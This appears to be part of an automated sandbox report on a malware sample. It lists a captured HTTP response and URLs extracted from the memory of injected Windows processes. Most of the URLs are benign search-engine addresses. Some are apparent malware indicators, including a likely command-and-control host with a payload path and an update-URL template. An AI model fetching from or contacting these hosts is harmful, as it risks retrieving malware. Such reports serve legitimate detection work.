HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Nov 2020 11:19:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001E.00000000.834306189.000000000FCE0000.00000004.00000001.sdmp	String found in binary or memory: http://api10.lapto
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001E.00000000.826232602.000000000A7C9000.00000004.00000001.sdmp	String found in binary or memory: http://c56.lepini.at/
Source: explorer.exe, 0000001E.00000000.826232602.000000000A7C9000.00000004.00000001.sdmp	String found in binary or memory: http://c56.lepini.at//
Source: explorer.exe, 0000001E.00000000.834306189.000000000FCE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000000.826664235.000000000A897000.00000004.00000001.sdmp	String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat
Source: explorer.exe, 0000001E.00000000.826232602.000000000A7C9000.00000004.00000001.sdmp	String found in binary or memory: http://c56.lepini.at/s
Source: explorer.exe, 0000001E.00000000.826002988.000000000A68A000.00000004.00000001.sdmp	String found in binary or memory: http://c56.lepini.at:80/jvassets/xI/t64.dat
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000012.00000003.771957559.000001EFF5CE8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000012.00000003.772095234.000001EFF6021000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsof
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.co/xa
Source: RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.ux
Source: RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmp	String found in binary or memory: http://ns.micro/1
Source: powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000012.00000002.810095687.000001EF80001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: RuntimeBroker.exe, 00000020.00000000.821757355.000001B4FAF7D000.00000004.00000001.sdmp	String found in binary or memory: http://twitter.com/spotify:
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: RuntimeBroker.exe, 00000020.00000003.856750140.000001B4FAF45000.00000004.00000001.sdmp	String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
